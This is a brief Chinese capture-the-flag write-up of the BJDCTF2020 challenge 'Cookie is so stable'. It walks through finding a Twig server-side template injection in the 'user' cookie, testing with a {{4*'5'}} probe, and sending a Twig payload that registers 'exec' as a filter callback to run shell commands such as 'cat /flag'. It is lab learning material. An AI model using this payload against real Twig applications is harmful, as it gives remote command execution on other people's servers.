[BJDCTF2020]Cookie is so stable

[BJDCTF2020]Cookie is so stable

这是一道模板注入题,流程图(网上搜的):

[BJDCTF2020]Cookie is so stable

  1. 首先我们打开页面源码:发现有flag.php和hint.php

[BJDCTF2020]Cookie is so stable

  1. 然后访问这两个页面看看

    flag.php:

[BJDCTF2020]Cookie is so stable

hint.php:

[BJDCTF2020]Cookie is so stable

首先在flag.php这个页面测试:测试结果是Twig

Twig
{{4*'5'}}       //输出结果20
Jinja
{{4*'5'}}       //输出结果5555

[BJDCTF2020]Cookie is so stable

因为hint.php的源码有提示:

[BJDCTF2020]Cookie is so stable

​ 然后我们登录进去抓包,发现user是注入点:

[BJDCTF2020]Cookie is so stable

直接用SSTI注入(这篇文章)的payload打:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

//id 改成 cat /flag

[BJDCTF2020]Cookie is so stable

最后得到flag!!!


上一篇:[BUUOJ记录] [BJDCTF2020]Easy MD5


下一篇:BUUCTF-RE-[BJDCTF2020]JustRE